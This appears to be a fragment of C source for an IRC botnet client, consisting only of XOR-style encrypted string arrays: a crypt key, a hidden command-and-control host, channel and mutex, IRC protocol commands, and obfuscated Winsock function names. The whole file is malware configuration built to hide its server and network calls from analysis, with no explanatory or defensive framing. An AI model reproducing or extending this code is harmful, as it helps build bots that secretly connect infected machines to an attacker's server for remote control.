char crypt_key[] = "\x4A\x31\x0F\x28\x40\x3B\x21\x08\x15\x0F\x2D\x18\x03\x15\x51\x3A\x49\x5C\x04\x25\x39\x62\x1C\x49\x54\x63\x41\x20\x1B\x33\x17\x05\x03\x20\x4C\x5F\x51\x3D\x2A\x42\x3A\x31\x47\x4F\x56\x42\x4E\x3A\x11\x37\x27\x10\x3B\x54\x48\x4A\x35\x41\x16\x10\x40\x19\x50\x60\x40\x3F\x30\x3A\x32\x53\x51\x4C\x19\x23\x0F\x43\x14\x20\x15\x05\x4B\x0A\x5D\x47\x2B\x56\x5C\x49\x34\x43\x51\x40\x5D\x4A\x33\x0C\x32\x2D\x58\x1F\x2B\x4B\x4D\x1D\x1B\x22\x44\x55\x4F\x3B\x3A\x19\x2C\x2F\x40\x4E\x3E\x0F\x23\x07\x2A\x02\x1B\x60\x17\x35\x38\x4A\xCC\xCC\xCC\xCC\xE8\x2B\x2A\xCB\xB8\xFF\x12";

char cfg_host[] = "\x7A\x77\x3F\x09\xD0\x78\x4F\x70\xD1\x5F\xD0\x2D\xC3";
char cfg_chan[] = "\x68\x22\x6C\x45";
char cfg_mutex[] = "\x28\x21\x62\x4B\x92\x3A\x18\x2C\x98\x13\x93\x72";
char str_irc_join[] = "\x01\x01\x44\x69";
char str_irc_nick[] = "\x05\x07\x4E\x6C";
char str_irc_ping[] = "\x1B\x07\x43\x60";
char str_irc_user[] = "\x1E\x1D\x48\x75";
char str_irc_privmsg[] = "\x1B\x1C\x44\x71\xAC\x1D\x30";
char str_wsdll[] = "\x3C\x3D\x3F\x78\xD2\x7C\x59\x3A\x8D\x1D";
char str_wsa[] = "\x1C\x1D\x4C\x74\x95\x2F\x05\x2A\x94\x01";
char str_sock[] = "\x38\x21\x6E\x4C\x84\x3A";
char str_ghbn[] = "\x2C\x2B\x79\x4F\x8E\x3D\x03\x3C\x98\x1F\x80\x70\x97";
char str_conn[] = "\x28\x21\x63\x49\x84\x2D\x03";
char str_send[] = "\x38\x2B\x63\x43";
char str_recv[] = "\x39\x2B\x6E\x51";
char str_closesock[] = "\x28\x22\x62\x54\x84\x3D\x18\x3D\x8A\x14\x95";
char str_htons[] = "\x23\x3A\x62\x49\x92";
